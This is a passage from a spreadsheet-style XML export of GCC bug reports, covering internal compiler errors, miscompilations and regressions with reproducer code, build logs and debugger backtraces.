$ apt-cache policy g++-4.6
g++-4.6:
  Installed: 4.6.3-1ubuntu5
  Candidate: 4.6.3-1ubuntu5
  Version table:
 *** 4.6.3-1ubuntu5 0
        500 http://us.archive.ubuntu.com/ubuntu/ precise/main amd64 Packages
        100 /var/lib/dpkg/status
$ lsb_release -rd
Description:	Ubuntu 12.04.1 LTS
Release:	12.04
I'm trying to compile a particular source file. When I compile it as follows I get the following error:
$ g++ -I ../include -I HelperLibraries -g -Wall -Wno-unused-value -shared -fPIC -o build/BasicIntegerParser_continuous.so ParserFunctions/BasicIntegerParser_continuous.cpp ../include/Vertica.cpp
ParserFunctions/BasicIntegerParser_continuous.cpp: In member function â€˜virtual Vertica::UDParser* BasicIntegerParserFactory::prepare(Vertica::ServerInterface&amp; Vertica::PerColumnParamReader&amp; Vertica::PlanContext&amp; const Vertica::SizedColumnTypes&amp;)â€™:
ParserFunctions/BasicIntegerParser_continuous.cpp:76:16: internal compiler error: in build_zero_init_1 at cp/init.c:279
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/cc8HZt1y.out file please attach this to your bugreport.
I expected the file to compile properly or at least provide an error message describing a fault in my code rather than in the compiler.
I have attached the preprocessed source file as requested by the error message.
The error reproduces for me on g++ 4.4.5 (installed on top of Red Hat Enterprise Linux -- hence concluding no Ubuntu dependency).  Others have reproduced this with both vanilla and Ubuntu-packaged g++ 4.7.2.
The bug does NOT reproduce for me on g++ 4.1.2 the above code compiles and runs as I would expect:
$ gcc -v
Using built-in specs.
Target: x86_64-redhat-linux
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --enable-checking=release --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-libgcj-multifile --enable-languages=cc++objcobj-c++javafortranada --enable-java-awt=gtk --disable-dssi --disable-plugin --with-java-home=/usr/lib/jvm/java-1.4.2-gcj-1.4.2.0/jre --with-cpu=generic --host=x86_64-redhat-linux
Thread model: posix
gcc version 4.1.2 20080704 (Red Hat 4.1.2-52)
The code also compiles and runs as I would expect under clang 3.0.  (I suspect that's not too useful for debugging but just in case / to be thorough.)
Please let me know if I can help out in debugging or fixing.</t>
  </si>
  <si>
    <t>aseering</t>
  </si>
  <si>
    <t>GCC-7279</t>
  </si>
  <si>
    <t>NRV related miscompilation</t>
  </si>
  <si>
    <t>See http://gcc.gnu.org/ml/gcc-patches/2002-07/msg00502.html
for details and testcase. Regression from 3.0.
Release:
3.1.1 20020710 (prerelease)
Environment:
i386-redhat-linux</t>
  </si>
  <si>
    <t>GCC-81116</t>
  </si>
  <si>
    <t>Last character of allocatable-length string reset to blank in an assigment</t>
  </si>
  <si>
    <t>This program shows that the last character of string is replaced by a blank but when a different variable is on the left side of the assignment the expected result is obtained:
program test10
implicit none
character(:) allocatable :: string new
!
string = '1234567890'
string = string(1:5) // string(7:)
print * ' string=' string ''
!
string = '1234567890'
new = string(1:5) // string(7:)
print *' new=   ' new ''
end program test10
The output I get is:
  string=12345789 
  new=   123457890</t>
  </si>
  <si>
    <t>clivegpage</t>
  </si>
  <si>
    <t>GCC-80908</t>
  </si>
  <si>
    <t>[c++1z] ICE on instantiating a template deducing the noexcept-ness of a function pointer</t>
  </si>
  <si>
    <t>Created attachment 41433
Minimal example code
The following incorrect code causes an internal compiler error in C++17 mode starting with gcc 7.1.0:
template
struct S
template
struct S {
	S() {}
}
void f() {}
int main() {
	S&lt;decltype(
}
The code is probably incorrect because it tries to deduce noexcept(bool) and is rejected by clang in C++17 mode.
Compiler invocation: g++ -std=c++1z example.cpp 
example.cpp: In instantiation of â€˜S::S() [with bool IsNoexcept = false]â€™:
example.cpp:12:19:   required from here
example.cpp:6:2: internal compiler error: Segmentation fault
  S() {}
  ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
gcc -v:
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-pc-linux-gnu/7.1.1/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /build/gcc/src/gcc/configure --prefix=/usr --libdir=/usr/lib --libexecdir=/usr/lib --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=https://bugs.archlinux.org/ --enable-languages=cc++adafortrangoltoobjcobj-c++ --enable-shared --enable-threads=posix --enable-libmpx --with-system-zlib --with-isl --enable-__cxa_atexit --disable-libunwind-exceptions --enable-clocale=gnu --disable-libstdcxx-pch --disable-libssp --enable-gnu-unique-object --
enable-linker-build-id --enable-lto --enable-plugin --enable-install-libiberty --with-linker-hash-style=gnu --enable-gnu-indirect-function --disable-multilib --disable-werror --enable-checking=release
Thread model: posix
gcc version 7.1.1 20170516 (GCC) 
On Wandbox: https://wandbox.org/permlink/xksH3sEPyOThuoiR</t>
  </si>
  <si>
    <t>hafnermorris</t>
  </si>
  <si>
    <t>GCC-1630</t>
  </si>
  <si>
    <t>[temp.deduct.call] allows more lenient qualifcation convs</t>
  </si>
  <si>
    <t>Type deduction in a function call allows more lenient
conversions than conv.qual [4.4] allows. The attached
program instantiates Foo but then issues
an error about converting int ** to int const *.
The deduction should fail as that wasn't a qualification
conversion in the first place.
This is related to fixing bug 1617
I'm having a little difficulty coming up with a test case
where we actually accept the erroneous deduction or issue
errors on different lines -- any suggestions welcome.
Release:
CVS 20010112</t>
  </si>
  <si>
    <t>GCC-26243</t>
  </si>
  <si>
    <t>[4.2/4.3/4.4 Regression] reassoc is not documented in passes.texi</t>
  </si>
  <si>
    <t>The reassoc pass is not documented in passes.texi.</t>
  </si>
  <si>
    <t>GCC-33140</t>
  </si>
  <si>
    <t>[4.3 Regression] ICE in build2_stat at tree.c:3115</t>
  </si>
  <si>
    <t>I'm getting the following ICE with current trunk.  This appeared between
20070720 and 20070811.
(sid)25830:tbm@em64t: ~] /usr/lib/gcc-snapshot/bin/gcc -c -O2 pari-base1.c
pari-base1.c: In function 'initzeta':
pari-base1.c:42: internal compiler error: in build2_stat at tree.c:3115
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>GCC-41345</t>
  </si>
  <si>
    <t>[4.5 Regression] bootstrap comparison failure with --disable-checking</t>
  </si>
  <si>
    <t>With current trunk (151649) bootstrap fails during the comparison stage when --disable-checking is used.  GCC was built with:
$ ../configure --disable-checking
$ make -j4
which ultimately results in:
make DESTDIR= RPATH_ENVVAR=LD_LIBRARY_PATH TARGET_SUBDIR=x86_64-unknown-linux-gnu bindir=/usr/local/bin datadir=/usr/local/share exec_prefix=/usr/local includedir=/usr/local/include datarootdir=/usr/local/share docdir=/usr/local/share/doc/ infodir=/usr/local/share/info pdfdir=/usr/local/share/doc/ htmldir=/usr/local/share/doc/ libdir=/usr/local/lib libexecdir=/usr/local/libexec lispdir= localstatedir=/usr/local/var mandir=/usr/local/share/man oldincludedir=/usr/include prefix=/usr/local sbindir=/usr/local/sbin sharedstatedir=/usr/local/com sysconfdir=/usr/local/etc tooldir=/usr/local/x86_64-unknown-linux-gnu build_tooldir=/usr/local/x86_64-unknown-linux-gnu target_alias=x86_64-unknown-linux-gnu AWK=gawk BISON=bison CC_FOR_BUILD=gcc CFLAGS_FOR_BUILD=-g -O2 CXX_FOR_BUILD=g++ EXPECT=expect FLEX=flex INSTALL=/usr/bin/install -c INSTALL_DATA=/usr/bin/install -c -m 644 INSTALL_PROGRAM=/usr/bin/install -c INSTALL_SCRIPT=/usr/bin/install -c LDFLAGS_FOR_BUILD= LEX=flex M4=m4 MAKE=make RUNTEST=runtest RUNTESTFLAGS= SED=/bin/sed SHELL=/bin/sh YACC=bison -y `echo 'ADAFLAGS=' | sed -e s'/[^=][^=]*=$/XFOO=/'` ADA_CFLAGS= AR_FLAGS=rc `echo 'BOOT_ADAFLAGS=-gnatpg -gnata' | sed -e s'/[^=][^=]*=$/XFOO=/'` BOOT_CFLAGS=-g -O2 BOOT_LDFLAGS= CFLAGS=-g -O2 CXXFLAGS=-g -O2 LDFLAGS= LIBCFLAGS=-g -O2 LIBCXXFLAGS=-g -O2 -fno-implicit-templates STAGE1_CHECKING=--enable-checking=yestypes STAGE1_LANGUAGES=c GNATBIND=no GNATMAKE=no AR_FOR_TARGET=ar AS_FOR_TARGET=as CC_FOR_TARGET=/home/dirtyepic/tmp/gcc-4.5-20090910/build/./gcc/xgcc -B/home/dirtyepic/tmp/gcc-4.5-20090910/build/./gcc/ CFLAGS_FOR_TARGET=-g -O2 CPPFLAGS_FOR_TARGET= CXX_FOR_TARGET=g++ CXXFLAGS_FOR_TARGET=-g -O2 -D_GNU_SOURCE DLLTOOL_FOR_TARGET=dlltool FLAGS_FOR_TARGET=-B/usr/local/x86_64-unknown-linux-gnu/bin/ -B/usr/local/x86_64-unknown-linux-gnu/lib/ -isystem /usr/local/x86_64-unknown-linux-gnu/include -isystem /usr/local/x86_64-unknown-linux-gnu/sys-include GCJ_FOR_TARGET= GFORTRAN_FOR_TARGET= LD_FOR_TARGET=/usr/lib/gcc/x86_64-unknown-linux-gnu/4.4.1/../../../../x86_64-unknown-linux-gnu/bin/ld LIPO_FOR_TARGET=lipo LDFLAGS_FOR_TARGET= LIBCFLAGS_FOR_TARGET=-g -O2 LIBCXXFLAGS_FOR_TARGET=-g -O2 -D_GNU_SOURCE -fno-implicit-templates NM_FOR_TARGET=nm OBJDUMP_FOR_TARGET=objdump RANLIB_FOR_TARGET=ranlib STRIP_FOR_TARGET=strip WINDRES_FOR_TARGET=windres WINDMC_FOR_TARGET=windmc BUILD_CONFIG=bootstrap-debug `echo 'LANGUAGES=' | sed -e s'/[^=][^=]*=$/XFOO=/'` LEAN=false STAGE1_CFLAGS=-g -fkeep-inline-functions STAGE1_TFLAGS= STAGE2_CFLAGS=-g -O2 -gtoggle STAGE2_TFLAGS= STAGE3_CFLAGS=-g -O2 STAGE3_TFLAGS= STAGE4_CFLAGS=-g -O2 STAGE4_TFLAGS= STAGEprofile_CFLAGS=-g -O2 -gtoggle -fprofile-generate STAGEprofile_TFLAGS= STAGEfeedback_CFLAGS=-g -O2 -fprofile-use STAGEfeedback_TFLAGS= TFLAGS= CONFIG_SHELL=/bin/sh MAKEINFO=makeinfo --split-size=5000000 --split-size=5000000  compare
make[2]: Entering directory `/home/dirtyepic/tmp/gcc-4.5-20090910/build'
make[3]: Entering directory `/home/dirtyepic/tmp/gcc-4.5-20090910/build'
rm -f stage_current
make[3]: Leaving directory `/home/dirtyepic/tmp/gcc-4.5-20090910/build'
Comparing stages 2 and 3
warning: gcc/cc1-checksum.o differs
Bootstrap comparison failure!
gcc/bitmap.o differs
make[2]: *** [compare] Error 1
make[2]: Leaving directory `/home/dirtyepic/tmp/gcc-4.5-20090910/build'
make[1]: *** [stage3-bubble] Error 2
make[1]: Leaving directory `/home/dirtyepic/tmp/gcc-4.5-20090910/build'
make: *** [all] Error 2</t>
  </si>
  <si>
    <t>rhill</t>
  </si>
  <si>
    <t>GCC-92</t>
  </si>
  <si>
    <t>labelled initializers</t>
  </si>
  <si>
    <t xml:space="preserve"> Original-Message-ID: 
 Date: Thu 18 Mar 1999 08:09:37 -0800
 I submitted the following bug report back in June last year.  I've just
 checked and egcs-1.1.2 still has the same bug:
 ----------------
 The following fragment illustrates a bug in egcs (2.91.28 19980508):
	 typedef struct {
	 } empty
	 typedef struct {
	     int             i
	     empty	    e
	     int            i2
	 } st
	 st s = {
	   i : 0
	   i2 : 1
	 }
 The assembler output is
	 .file	test.c
 gcc2_compiled.:
 ___gnu_compiled_c:
 .globl _s
 .data
	 .align 20x90
	 .type	 _s@object
	 .size	 _s8
 _s:
	 .long 0
	 .space 4
 The '1' in the second initialised field seems to have disappeared.
 gcc 2.7.2 compiles this correctly.
 Cheers
	 Simon
Release:
2.95.2</t>
  </si>
  <si>
    <t>GCC-41811</t>
  </si>
  <si>
    <t>graphite miscompiles 454.calculix of the SPEC 2k6</t>
  </si>
  <si>
    <t>The kernel that is miscompiled is in shape20h.f and it looks like this:
      do i=13
        do j=13
          xs(ij)=0.d0
          do k=120
            xs(ij)=xs(ij)+xl(ik)*shp(jk)
          enddo
        enddo
      enddo
There is an interchange of the j and k loops that is applied to the
kernel.  The statement induction variable order is interchanged for
scat_5 and scat_3 as in S5(scat_1scat_5scat_3).  The code generated
by CLooG looks like this:
for (scat_1=0scat_1&lt;=2scat_1++) {
  S3(scat_1) 
  for (scat_3=0scat_3&lt;=1scat_3++) {
    S4(scat_1scat_3) 
    for (scat_5=0scat_5&lt;=2scat_5++) {
      S5(scat_1scat_5scat_3) 
      S6(scat_1scat_5scat_3) 
    }
    S7(scat_1scat_3) 
    S26(scat_1scat_3) 
    S8(scat_1scat_3) 
  }
  S4(scat_12) 
  for (scat_5=0scat_5&lt;=2scat_5++) {
    S5(scat_1scat_52) 
    S6(scat_1scat_52) 
  }
  S7(scat_12) 
  S26(scat_12) 
  for (scat_3=3scat_3&lt;=18scat_3++) {
    for (scat_5=0scat_5&lt;=2scat_5++) {
      S5(scat_1scat_5scat_3) 
      S6(scat_1scat_5scat_3) 
    }
  }
  for (scat_5=0scat_5&lt;=2scat_5++) {
    S5(scat_1scat_519) 
  }
}</t>
  </si>
  <si>
    <t>GCC-1198</t>
  </si>
  <si>
    <t>StreamTokenizer doesn't scan mixed token types correctly</t>
  </si>
  <si>
    <t xml:space="preserve">From: green@sourceware.cygnus.com
To: java-gnats@sourceware.cygnus.com
Cc:  
Subject: java.io/141
Date: 6 Mar 2000 03:48:34 -0000
 CVSROOT:	/cvs/java
 Module name:	libgcj
 Changes by:	green@sourceware.cygnus.com	00/03/05 19:48:34
 Modified files:
 	libjava/testsuite: ChangeLog 
 Added files:
 	libjava/testsuite/libjava.lang: PR141.java PR141.out 
 Log message:
 	2000-03-05  Anthony Green  
 	* libjava.lang/PR141.java: New file.
 	* libjava.lang/PR141.out: New file.
 	For PR java.io/141.
 Patches:
 http://gcc.gnu.org/cgi-bin/gcc/libjava/testsuite/ChangeLog.diff?cvsroot=java&amp;r1=1.58&amp;r2=1.59
 http://gcc.gnu.org/cgi-bin/gcc/libjava/testsuite/libjava.lang/PR141.java.diff?cvsroot=java&amp;r1=NONE&amp;r2=1.1
 http://gcc.gnu.org/cgi-bin/gcc/libjava/testsuite/libjava.lang/PR141.out.diff?cvsroot=java&amp;r1=NONE&amp;r2=1.1
</t>
  </si>
  <si>
    <t>GCC-4532</t>
  </si>
  <si>
    <t>typo in bits/stl_algo.h for partial_sort</t>
  </si>
  <si>
    <t>In bits/stl_algo.h the partial_sort method has the line
__glibcpp_function_requires(_LessThanComparableConcept&lt;_ValueType)
This is missing the closing `&gt;' on the template parameter which only becomes visible when you turn on concept checks.
Release:
CVS tree</t>
  </si>
  <si>
    <t>GCC-6361</t>
  </si>
  <si>
    <t>Internal compiler error in g++-v3/bits/locale_facets.tcc with GCC 3.0.4 on IRIX</t>
  </si>
  <si>
    <t>When compiling the attached code on IRIX 6.5 with GCC 3.0.4 the following error occurs:
/home/users/patrick/irix-gcc3.0/include/g++-v3/bits/locale_facets.tcc:75: Internal
   compiler error in dwarf2out_finish at dwarf2out.c:11277
I have found that the error does not occur if -g is not part of the command line.
The full output from the command line is:
g++ -v -save-temps -DHAVE_CONFIG_H -DPLX_SHARE_DIR=\share\ -D_PLX_BUILD_ -I/home9/users/patrick/src/Juggler/main/juggler/build.irix.posix.sim.gcc3-plexus/modules/plexus -I/home9/users/patrick/src/Juggler/main/juggler/build.irix.posix.sim.gcc3-plexus/..//modules/plexus  -ftemplate-depth-20 -Wall -Werror-implicit-function-declaration  -fexceptions -I/home9/users/patrick/src/Juggler/main/juggler/build.irix.posix.sim.gcc3-plexus/instlinks/include  -D_DEBUG -g -fPIC -DPIC -c -o /home9/users/patrick/src/Juggler/main/juggler/build.irix.posix.sim.gcc3-plexus/modules/plexus/obj/IRIX/N32/mips4/debug/libplexus/Harness.o /home9/users/patrick/src/Juggler/main/juggler/build.irix.posix.sim.gcc3-plexus/..//modules/plexus/plx/Harness/Harness.cpp
Reading specs from /home/users/patrick/irix-gcc3.0/lib/gcc-lib/mips-sgi-irix6.5/3.0.4/specs
Configured with: ../configure --prefix=/home/users/patrick/irix-gcc3.0 --disable-shared --enable-languages=cc++ --enable-threads=posix --verbose
Thread model: posix
gcc version 3.0.4
 /home/users/patrick/irix-gcc3.0/lib/gcc-lib/mips-sgi-irix6.5/3.0.4/cpp0 -lang-c++ -D__GNUG__=3 -D__GXX_DEPRECATED -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -v -I/home9/users/patrick/src/Juggler/main/juggler/build.irix.posix.sim.gcc3-plexus/modules/plexus -I/home9/users/patrick/src/Juggler/main/juggler/build.irix.posix.sim.gcc3-plexus/..//modules/plexus -I/home9/users/patrick/src/Juggler/main/juggler/build.irix.posix.sim.gcc3-plexus/instlinks/include -D__GNUC__=3 -D__GNUC_MINOR__=0 -D__GNUC_PATCHLEVEL__=4 -Dunix -Dmips -Dsgi -Dhost_mips -DMIPSEB -D_MIPSEB -DSYSTYPE_SVR4 -D_LONGLONG -D_SVR4_SOURCE -D_MODERN_C -D__DSO__ -D__unix__ -D__mips__ -D__sgi__ -D__host_mips__ -D__MIPSEB__ -D_MIPSEB -D__SYSTYPE_SVR4__ -D_LONGLONG -D_SVR4_SOURCE -D_MODERN_C -D__DSO__ -D__unix -D__mips -D__sgi -D__host_mips -D__MIPSEB -D__SYSTYPE_SVR4 -Asystem=unix -Asystem=svr4 -Acpu=mips -Amachine=sgi -D__CHAR_UNSIGNED__ -D__NO_INLINE__ -D__STDC_HOSTED__=1 -Wall -Werror-implicit-function-declaration -D__LANGUAGE_C -D_LANGUAGE_C -DLANGUAGE_C -D__SIZE_TYPE__=unsigned int -D__PTRDIFF_TYPE__=int -D__WCHAR_TYPE__=long int -D__WINT_TYPE__=long int -D__EXTENSIONS__ -D_SGI_SOURCE -D_MIPS_FPSET=32 -D_MIPS_ISA=_MIPS_ISA_MIPS3 -D_ABIN32=2 -D_MIPS_SIM=_ABIN32 -D_MIPS_SZINT=32 -D_MIPS_SZLONG=32 -D_MIPS_SZPTR=32 -D_COMPILER_VERSION=601 -U__mips -D__mips=3 -D__mips64 -DHAVE_CONFIG_H -DPLX_SHARE_DIR=share -D_PLX_BUILD_ -D_DEBUG -DPIC /home9/users/patrick/src/Juggler/main/juggler/build.irix.posix.sim.gcc3-plexus/..//modules/plexus/plx/Harness/Harness.cpp Harness.ii
GNU CPP version 3.0.4 (cpplib) [AL 1.1 MM 40] SGI running IRIX 6.x
ignoring nonexistent directory /home/users/patrick/irix-gcc3.0/mips-sgi-irix6.5/include
#include ... search starts here:
#include  search starts here:
 /home9/users/patrick/src/Juggler/main/juggler/build.irix.posix.sim.gcc3-plexus/modules/plexus
 /home9/users/patrick/src/Juggler/main/juggler/modules/plexus
 /home9/users/patrick/src/Juggler/main/juggler/build.irix.posix.sim.gcc3-plexus/instlinks/include
 /home/users/patrick/irix-gcc3.0/include/g++-v3
 /home/users/patrick/irix-gcc3.0/include/g++-v3/mips-sgi-irix6.5
 /home/users/patrick/irix-gcc3.0/include/g++-v3/backward
 /usr/local/include
 /home/users/patrick/irix-gcc3.0/include
 /home/users/patrick/irix-gcc3.0/lib/gcc-lib/mips-sgi-irix6.5/3.0.4/include
 /usr/include
End of search list.
 /home/users/patrick/irix-gcc3.0/lib/gcc-lib/mips-sgi-irix6.5/3.0.4/cc1plus -fpreprocessed Harness.ii -quiet -dumpbase Harness.cpp -g -Wall -Werror-implicit-function-declaration -version -ftemplate-depth-20 -fexceptions -fPIC -o Harness.s
GNU CPP version 3.0.4 (cpplib) [AL 1.1 MM 40] SGI running IRIX 6.x
GNU C++ version 3.0.4 (mips-sgi-irix6.5)
        compiled by GNU C version 3.0.4.
/home9/users/patrick/src/Juggler/main/juggler/modules/plexus/plx/Harness/Harness.cpp: In
   method `void plx::Harness::stepForward(vpr::Interval Uint32&amp;)':
/home9/users/patrick/src/Juggler/main/juggler/modules/plexus/plx/Harness/Harness.cpp:231: warning: unused
   variable `plx::Router*cur_router'
/home/users/patrick/irix-gcc3.0/include/g++-v3/bits/stl_alloc.h: At global 
   scope:
/home/users/patrick/irix-gcc3.0/include/g++-v3/bits/stl_alloc.h: In instantiation of `std::_STL_mutex_lock std::__default_alloc_template::_S_node_allocator_lock':
/home/users/patrick/irix-gcc3.0/include/g++-v3/bits/stl_alloc.h:316:   instantiated from `std::__default_alloc_template::_Lock::_Lock() [with bool threads = true int inst = 0]'
/home/users/patrick/irix-gcc3.0/include/g++-v3/bits/stl_alloc.h:365:   instantiated from `static void std::__default_alloc_template::deallocate(void* unsigned int) [with bool threads = true int inst = 0]'
/home/users/patrick/irix-gcc3.0/include/g++-v3/bits/stl_alloc.h:188:   instantiated from `static void std::simple_alloc::deallocate(_Tp* unsigned int) [with _Tp = Uint8 _Alloc = std::__default_alloc_template]'
/home/users/patrick/irix-gcc3.0/include/g++-v3/bits/stl_vector.h:122:   instantiated from `void std::_Vector_alloc_base::_M_deallocate(_Tp* unsigned int) [with _Tp = Uint8 _Allocator = std::allocator]'
/home/users/patrick/irix-gcc3.0/include/g++-v3/bits/stl_vector.h:501:   instantiated from `std::vector&amp; std::vector::operator=(const std::vector&amp;) [with _Tp = Uint8 _Alloc = std::allocator]'
/home9/users/patrick/src/Juggler/main/juggler/modules/plexus/plx/Message/Message.h:131:   instantiated from here
/home/users/patrick/irix-gcc3.0/include/g++-v3/bits/stl_alloc.h:523: warning: aggregate
   has a partly bracketed initializer
/home/users/patrick/irix-gcc3.0/include/g++-v3/bits/locale_facets.tcc:75: Internal
   compiler error in dwarf2out_finish at dwarf2out.c:11277
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
3.0.4
Environment:
IRIX64 lego 6.5 10100655 IP27
Reading specs from /home/users/patrick/irix-gcc3.0-old/bin/../lib/gcc-lib/mips-sgi-irix6.5/3.0.4/specs
Configured with: ../configure --prefix=/home/users/patrick/irix-gcc3.0 --disable-shared --enable-languages=cc++ --enable-threads=posix --verbose
Thread model: posix
gcc version 3.0.4
How-To-Repeat:
g++ -c -g Harness.ii</t>
  </si>
  <si>
    <t>GCC-17603</t>
  </si>
  <si>
    <t>[4.0 Regression] cpowf and cpowl give wrong results</t>
  </si>
  <si>
    <t>Hi
on some platforms 26_numerics/complex/13450.cc has been failing for some time.
I tracked down the problem to the complex pow builtins. Just run (-O0 suffices)
the below:
#include 
// libstdc++/13450
int main()
{
  __complex__ long double x
  __complex__ long double y
  __complex__ long double z
  __real__ x = -1.0l
  __imag__ x = 0.0l
  __real__ y = 0.5l
  __imag__ y = 0.0l
  z = __builtin_cpowl(x y)
  assert( __imag__ z &gt; 0.99l 
}
Indeed if I print z inside gdb:
$1 =  + 3.6451995318824746025284059336194198e-4951 * I
instead of the expected (3.4 is ok): ~0 + 1 * I.
Similar problems affect __builtin_cpowf just let me know and I can prepare
a suited testcase. In any case in order to double check that everything is
finally ok just run the libstdc++ testsuite ) ...</t>
  </si>
  <si>
    <t>GCC-10003</t>
  </si>
  <si>
    <t>gcc -g mis-places low_pc of inlined functions</t>
  </si>
  <si>
    <t>This one it pretty nasty: if we place a breakpoint at an inlined
function's low_pc the arguments aren't even on the stack yet !
Release:
3.3 20030303 (prerelease)
Environment:
System: Linux ar 2.4.18 #5 Mon Mar 18 09:25:24 ART 2002 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ./configure --prefix=/usr/local/gcc20030303/ --enable-languages=c
How-To-Repeat:
Example (with Red Hat's gcc 3.1 20011127 on ia32):
$ cat foo.c
int xyz
static inline int foo(int bar)
{
label:
        xyz = bar
}
void main(int argc)
{
    foo(123)
}
EOF
$ gcc -w -g foo.c       # gcc 3.3: gcc -w -g -finline foo.c
$ readelf -w a.out
...
 : Abbrev Number: 4 (DW_TAG_inlined_subroutine)
     DW_AT_abstract_origin: 
     DW_AT_low_pc      : 0x80483a8 134513576
...
$ objdump -d a.out 
...
08048398 :
...
 80483a6:       29 c4                   sub    %eax%esp
 80483a8:       c7 45 fc 7b 00 00 00    movl   $0x7b0xfffffffc(%ebp)
 80483af:       8b 45 fc                mov    0xfffffffc(%ebp)%eax
 80483b2:       a3 34 95 04 08          mov    %eax0x8049534
 80483b7:       c9                      leave
...</t>
  </si>
  <si>
    <t>GCC-25252</t>
  </si>
  <si>
    <t>ICE on invalid code</t>
  </si>
  <si>
    <t>Hi
Following invalid code (association stmt sint=&gt;sreal) causes an ICE.
$ cat test.f90
       MODULE gswap
         TYPE points
           REAL :: x y
         END TYPE points
         INTERFACE swap
           MODULE PROCEDURE sreal schar sint =&gt; sreal
         END INTERFACE swap
       CONTAINS
         SUBROUTINE sreal(ab)
           real intent(inout) :: ab
           real :: temp
           temp=a
           a=b
           b=temp
         END SUBROUTINE sreal
       END MODULE gswap
       program test_swap
       USE gswap
       integer :: i = 2  j=3
       call swap(ij)
       end program test_swap
$ gfortran test.f90
 In file test.f90:6
           MODULE PROCEDURE sreal schar sint =&gt; sreal
                                             1
Error: Syntax error in MODULE PROCEDURE statement at (1)
test.f90:0: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
gdb output
(gdb) r 
Program received signal SIGSEGV Segmentation fault.
0x1001c2d8 in show_locus (offset=0 loc=0x10773018)
    at /home/gccbuild/gcc_trunk_anonsvn/trunk/gcc/fortran/error.c:137
137       error_printf (In file %s:%d\n f-&gt;filename
(gdb) bt
#0  0x1001c2d8 in show_locus (offset=0 loc=0x10773018)
    at /home/gccbuild/gcc_trunk_anonsvn/trunk/gcc/fortran/error.c:137
#1  0x1001c4c4 in show_loci (l1=Variable l1 is not available.
)
    at /home/gccbuild/gcc_trunk_anonsvn/trunk/gcc/fortran/error.c:270
#2  0x22000442 in ?? ()
#3  0x1001b9a4 in error_print (type=0x1054d4b4 Error:
    format0=0x1054e254 Procedure '%s' in %s at %L is neither function nor subroutine argp=Variable argp is not available.
)
    at /home/gccbuild/gcc_trunk_anonsvn/trunk/gcc/fortran/error.c:381
#4  0x1001bd30 in gfc_error (
    nocmsgid=0x1054e254 Procedure '%s' in %s at %L is neither function nor subroutine) at /home/gccbuild/gcc_trunk_anonsvn/trunk/gcc/fortran/error.c:595
#5  0x1001fd88 in check_interface0 (p=Variable p is not available.
)
    at /home/gccbuild/gcc_trunk_anonsvn/trunk/gcc/fortran/interface.c:880
#6  0x10022134 in check_sym_interfaces (sym=0x10772bb8)
    at /home/gccbuild/gcc_trunk_anonsvn/trunk/gcc/fortran/interface.c:960
#7  0x1005ba50 in traverse_ns (st=0x10772b98
    func=0x100220b0 )
    at /home/gccbuild/gcc_trunk_anonsvn/trunk/gcc/fortran/symbol.c:2416
#8  0x10021c20 in gfc_check_interfaces (ns=0x107726c0)
    at /home/gccbuild/gcc_trunk_anonsvn/trunk/gcc/fortran/interface.c:1015
#9  0x28000422 in ?? ()
#10 0x10050af4 in gfc_resolve (ns=0x107726c0)
---Type  to continue or q  to quit---
    at /home/gccbuild/gcc_trunk_anonsvn/trunk/gcc/fortran/resolve.c:5436
#11 0x24000482 in ?? ()
#12 0x10046aa4 in gfc_parse_file ()
    at /home/gccbuild/gcc_trunk_anonsvn/trunk/gcc/fortran/parse.c:2659
#13 0x10066c04 in gfc_be_parse_file (set_yydebug=Variable set_yydebug is not available.
)
    at /home/gccbuild/gcc_trunk_anonsvn/trunk/gcc/fortran/f95-lang.c:286
#14 0x1034584c in toplev_main (argc=Variable argc is not available.
)
    at /home/gccbuild/gcc_trunk_anonsvn/trunk/gcc/toplev.c:990
#15 0x10093900 in main (argc=Variable argc is not available.
)
    at /home/gccbuild/gcc_trunk_anonsvn/trunk/gcc/main.c:35
(gdb)</t>
  </si>
  <si>
    <t>GCC-18436</t>
  </si>
  <si>
    <t>[3.4/4.0 Regression] ICE in perform_or_defer_access_check (binfo is NULL)</t>
  </si>
  <si>
    <t>I get an ICE with the attached pre-processed code.
I get it with g++ 3.4.3 as well as 4.0.0-20041111.
With no particular command line option (-O2 or nothing produces it).</t>
  </si>
  <si>
    <t>pion.sylvain</t>
  </si>
  <si>
    <t>GCC-4335</t>
  </si>
  <si>
    <t>Gnu Help reqired by fellow Human</t>
  </si>
  <si>
    <t xml:space="preserve"> Greeting GCC Gurus
 	I am a network administrator from a company in Australia. I have
 been searching the interenet to resolve a particular error I am getting when
 trying to compile a large program under GNU on HPUX 10:20
 /var/tmp/ccx9VmA1.s:220170: Error: Field out of range [-262144..262143]
 (534212).
 /var/tmp/ccx9VmA1.s:220170: Error: Field out of range [-262144..262143]
 (534204). 
 /var/tmp/ccx9VmA1.s:220170: Error: Field out of range [-262144..262143]
 (534196). 
 I was wondering if you know of a fix for this as yet or if you might know
 where I could find the solution.
 I would greatly appreciate your help as I know you can understand how
 frustrating these things can be.
 Kind Regards
 Ravi Berry
 (Network Administrator)
 Paperless Warehousing Pty Ltd.
   ****&gt; **************   IMPORTANT MESSAGE
 ************************************************************
 &gt; 
 &gt; The information contained in or attached to this message is intended only
 &gt; for the people it is addressed to. If you are not the intended recipient
 &gt; any use disclosure or copying of this information is unauthorised and &gt;
 prohibited. This information may be confidential or subject to legal &gt;
 privilege. It is not the expressed view of Paperless Warehousing or any of
 its &gt; subsidiaries unless that is clearly stated. Paperless Warehousing
 cannot accept &gt; liability &gt; for any damage caused by this message.
Release:
unknown</t>
  </si>
  <si>
    <t>rberry</t>
  </si>
  <si>
    <t>GCC-77637</t>
  </si>
  <si>
    <t>ICE on x86_64-linux-gnu (Segmentation fault tree_check cp_parser_std_attribute_list...)</t>
  </si>
  <si>
    <t>$ g++-trunk -v
Using built-in specs.
